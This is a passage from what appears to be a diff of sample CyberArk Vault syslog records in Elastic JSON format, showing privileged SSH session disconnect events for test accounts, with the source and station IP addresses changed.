Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM 
Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 67.43.156.14\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n 
Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:34:50Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n 
Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.2.69.143\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
